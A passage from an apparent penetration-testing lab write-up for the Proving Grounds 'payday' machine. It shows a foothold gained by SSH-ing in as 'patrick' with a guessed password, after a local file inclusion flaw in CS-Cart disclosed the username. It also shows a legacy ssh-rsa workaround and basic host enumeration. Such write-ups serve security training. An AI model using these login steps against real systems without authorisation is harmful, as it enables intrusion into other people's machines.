SSH


There’s been a username disclosure through the identified LFI vulnerability in the target CS-Cart instance

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ sshpass -p patrick ssh patrick@$IP
Unable to negotiate with 192.168.116.39 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

The target SSH server only supports ssh-rsa and ssh-dss

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ sshpass -p patrick ssh patrick@$IP -o HostKeyAlgorithms=+ssh-rsa
Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Sun Feb  9 09:19:32 2025 from 192.168.45.215
patrick@payday:~$ whoami
patrick
patrick@payday:~$ hostname
payday
patrick@payday:~$ ipconfig 
-bash: ipconfig: command not found
patrick@payday:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:9E:B2:F4  
          inet addr:192.168.116.39  Bcast:192.168.116.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fe9e:b2f4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:37768 errors:1 dropped:1 overruns:0 frame:0
          TX packets:22161 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2984258 (2.8 MB)  TX bytes:2142032 (2.0 MB)
          Interrupt:17 Base address:0x2000 
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:503 errors:0 dropped:0 overruns:0 frame:0
          TX packets:503 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:682031 (666.0 KB)  TX bytes:682031 (666.0 KB)

Initial Foothold established to the target system as the patrick user via SSH